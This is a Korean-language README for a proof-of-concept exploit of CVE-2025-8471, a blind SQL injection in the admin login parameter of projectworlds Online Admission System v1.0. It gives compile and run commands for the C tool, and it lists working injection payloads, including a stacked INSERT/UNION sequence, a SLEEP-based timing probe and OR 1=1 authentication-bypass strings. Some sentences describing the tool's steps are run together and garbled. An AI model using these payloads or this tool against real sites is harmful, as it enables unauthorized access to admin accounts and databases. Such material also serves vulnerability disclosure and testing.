
projectworlds Online Admissions System v1.0에서 SQL 인젝션 익스플로잇
저자: Byte Reaper
CVE: CVE-2025-8471
취약점: "projectworlds Online Admission System v1.0"의 SQL 인젝션
설명:
adminlogin.php?a_id=에 블라인드 SQL 인젝션이 존재합니다. 이 PoC는 다양한 페이로드(2단계 INSERT … UNION SELECT …, SLEEP(), SELECT code … 및 "딥 인젝션" 문자열)를 포함한 일련의 GET 요청을 전송하여 응답 길이 차이를 통해 문제를 탐지하고 열거합니다.
libcurl과 argparse가 설치되어 있는지 확인하십시오 (예: Debian/Ubuntu: sudo apt-get install libcurl4-openssl-dev).
컴파일:
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u <TARGET_BASE_URL> [-c cookies.txt] [-v]
-u, --url — 대상의 기본 URL, 예: http://vulnsite.com
-c, --cookies — (선택 사항) 세션 유지를 위한 쿠키 파일 경로
-v, --verbose — libcurl 상세 출력 및 전체 응답 덤프 활성화
./exploit -u http:// -v
이 작업은 다음을 수행합니다:
/adminlogin.php에 일반 요청을 보내고 그 길이를 기록합니다.?a_id=…에 삽입합니다.result.log에 기록합니다.테스트된 페이로드: 2단계
INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');
SELECT SLEEP(2);
SELECT code FROM stages WHERE id = 3;
딥 인젝션
'//OR//1=1--, '//OR//'a'='a'--, …
Boolean, 시간 기반, UNION, 부분 문자열, ORDER BY, LIKE, EXISTS, 주석 스타일 인젝션을 포함합니다.
모든 페이로드는 전달 전에 curl_easy_escape를 통해 URL 인코딩됩니다.
MIT License